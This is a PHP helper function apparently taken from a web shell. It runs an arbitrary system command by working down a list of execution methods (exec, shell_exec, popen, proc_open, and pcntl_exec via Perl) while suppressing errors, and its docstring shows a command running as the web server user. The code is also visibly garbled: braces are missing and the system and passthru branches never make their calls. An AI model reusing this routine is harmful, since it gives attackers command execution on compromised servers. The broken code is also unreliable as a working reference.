// execute($cmd) (type => string):
// Try any way to execute the given system command.
// The command output is returned by the function.
// $cmd (string):
// The command line string to run.
// >>> execute("whoami")
// "www-data"
// TODO: This function is probably highly optimizable.
function execute($cmd)
$res = '';
if (@function_exists('exec'))
@exec($cmd, $res);
$res = implode("\n", $res);
elseif (@function_exists('shell_exec'))
$res = @shell_exec($cmd);
elseif (@function_exists('system'))
$res = @ob_get_contents();
elseif (@function_exists('passthru'))
$res = @ob_get_contents();
elseif (@is_resource($f = @popen($cmd, 'r')))
if (@function_exists('fread') && @function_exists('feof'))
while (!@feof($f))
$res .= @fread($f, 1024);
elseif (@function_exists('fgets') && @function_exists('feof'))
while (!@feof($f))
$res .= @fgets($f, 1024);
elseif (@is_resource($f = @proc_open($cmd, array(1 => array("pipe", "w")), $pipes)))
if (@function_exists('fread') && @function_exists('feof'))
while (!@feof($pipes[1]))
$res .= @fread($pipes[1], 1024);
elseif (@function_exists('fgets') && @function_exists('feof'))
while (!@feof($pipes[1]))
$res .= @fgets($pipes[1],1024);
elseif (@function_exists('pcntl_exec') && @function_exists('pcntl_fork'))
$res = '[~] Blind Command Execution via [pcntl_exec]\n\n';
$pid = @pcntl_fork();
if ($pid == -1)
$res .= '[-] Could not children fork. Exit';
elseif ($pid)
if (@pcntl_wifexited($status))
$res .= '[+] Done! Command "' . $cmd . '" successfully executed.';
$res .= '[-] Error. Command incorrect.';
$cmd = array(" -e 'system(\"$cmd\")'");
if (@pcntl_exec('/usr/bin/perl', $cmd))
exit (0);
if (@pcntl_exec('/usr/local/bin/perl', $cmd))
exit (0);
die ();
if (!is_string($res) || empty($res))
return ("");
return ($res);